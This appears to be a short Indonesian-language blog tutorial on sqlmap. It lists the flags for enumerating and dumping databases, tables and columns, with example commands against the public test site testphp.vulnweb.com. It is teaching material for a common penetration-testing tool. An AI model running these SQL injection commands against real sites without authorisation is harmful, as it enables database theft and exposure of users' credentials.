Sqlmap is an open source penetration testing tool that automates the proceses of detecting and exploting SQL injection flaws and taking over of database server...
Support to enumerate users, password hashes, privileges roles, databases, tables and columns
( Sqlmap adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kekurangan injeksi SQL dan mengambil alih server database...
Dukungan untuk menghitung pengguna, hash kata sandi, peran hak istimewa, database, tabel dan kolom )
Perintah-perintah dasar sqlmap untuk melakukan sql injection
-u ( fungsi nya untuk memanggil url yang kalian inject )
--dbs ( untuk melihat list database yang terdapat pada web target )
-D ( untuk memilih suatu database untuk ditampilkan )
--tables ( untuk melihat list tabel pada database yang di pilih )
-T ( untuk memilih tabel pada list tabel yang berhasil di tampilkan )
--columns ( untuk menampilkan list kolom pada tabel yang di pilih )
-C ( untuk memilih kolom pada list kolom yang berhasil di tampilkan )
--dump ( untuk melihat isi dari suatu kolom atau tabel juga bisa )
Command are here :
$ cd sqlmap
$ python2 sqlmap.py
$ python2 sqlmap.py
Dan ini hanya contoh web nya okey...
$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name --tables
$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name --columns
$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name -C columns_name --dump
Done.
0 komentar: